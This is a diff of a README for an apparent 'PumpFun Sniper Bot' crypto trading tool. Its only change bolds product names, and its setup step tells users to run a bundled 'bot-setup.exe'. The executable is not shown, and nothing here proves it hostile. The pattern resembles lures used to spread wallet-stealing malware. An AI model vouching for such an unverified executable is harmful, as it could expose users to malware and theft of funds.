SniperDev00001/PumpFun-Sniper-Bot/README.md

 ![PumpFun Bot Logo](readme/banner.png)

 ## Overview
-Welcome to PumpFun Bot, your ultimate trading companion designed specifically for PumpFun.
+Welcome to **PumpFun Bot**, your ultimate trading companion designed specifically for **PumpFun**.
 Whether you're a seasoned trader or just starting out, PumpFun Bot equips you with the tools and flexibility to navigate the virtual trading world with confidence and ease.

 ## Getting Started
 1. **Download**: Download directly from this repository.
 Simply execute the file **bot-setup.exe** and start using the bot!